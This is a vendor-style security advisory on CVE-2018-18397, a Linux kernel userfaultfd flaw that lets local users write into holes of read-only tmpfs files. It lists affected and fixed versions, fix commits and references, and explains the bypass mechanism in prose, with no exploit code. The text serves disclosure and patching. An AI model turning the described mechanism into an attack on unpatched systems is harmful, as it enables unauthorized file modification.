ASA-2018-00070 – Linux kernel: userfaultfd bypasses tmpfs file permission


Allele Security Alert

ASA-2018-00070

Identifier(s)

ASA-2018-00070, CVE-2018-18397

Title

userfaultfd bypasses tmpfs file permission

Vendor(s)

Linux foundation

Product(s)

Linux kernel

Affected version(s)

Linux kernel versions before 4.20

Linux kernel versions 4.14.x before 4.14.87
Linux kernel versions 4.19.x before 4.19.7

Fixed version(s)

Linux kernel version 4.20

Linux kernel version 4.14.87
Linux kernel version 4.19.7

Proof of concept

Yes

Description

The userfaultfd implementation in the Linux kernel mishandles access control for certain UFFDIO_ ioctl calls, as demonstrated by allowing local users to write data into holes in a tmpfs file (if the user has read-only access to that file, and that file contains holes), related to fs/userfaultfd.c and mm/userfaultfd.c.

Technical details

Using the userfaultfd API, it is possible to first register a userfaultfd region for any VMA that fulfills vma_can_userfault(): It must be an anonymous VMA (->vm_ops==NULL), a hugetlb VMA (VM_HUGETLB), or a shmem VMA (->vm_ops==shmem_vm_ops). This means that it is, for example, possible to register userfaulfd regions for shared readonly mappings of tmpfs files.

Afterwards, the userfaultfd API can be used on such a region to (atomically) write data into holes in the file’s mapping. This API also works on readonly shared mappings.

This means that an attacker with read-only access to a tmpfs file that contains holes can write data into holes in the file.

Credits

Jann Horn (Google Project Zero)

Reference(s)

Linux: userfaultfd bypasses tmpfs file permissions
https://bugs.chromium.org/p/project-zero/issues/detail?id=1700

Linux kernel: userfaultfd bypasses tmpfs file permissions (CVE-2018-18397; since 4.11; fixed in 4.14.87 and 4.19.7)
https://seclists.org/oss-sec/2018/q4/219

userfaultfd: shmem/hugetlbfs: only allow to register VM_MAYWRITE vmas
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=29ec90660d68bbdd69507c1c8b4e33aa299278b1

hugetlb: implement memfd sealing
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ff62a34210441103108d435ae8a00a777c4dcb99

userfaultfd: shmem/hugetlbfs: only allow to register VM_MAYWRITE vmas
https://github.com/torvalds/linux/commit/29ec90660d68bbdd69507c1c8b4e33aa299278b1

hugetlb: implement memfd sealing
https://github.com/torvalds/linux/commit/ff62a34210441103108d435ae8a00a777c4dcb99

Linux 4.20
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.20

Linux 4.19.7
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.7

Linux 4.14.87
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.87

CVE-2018-18397 - Red Hat Customer Portal
https://access.redhat.com/security/cve/CVE-2018-18397

CVE-2018-18397 in Ubuntu
https://people.canonical.com/~ubuntu-security/cve/CVE-2018-18397.html

CVE-2018-18397
https://security-tracker.debian.org/tracker/CVE-2018-18397

CVE-2018-18397 | SUSE
https://www.suse.com/security/cve/CVE-2018-18397

CVE-2018-18397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18397

CVE-2018-18397
https://nvd.nist.gov/vuln/detail/CVE-2018-18397

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: November 29, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.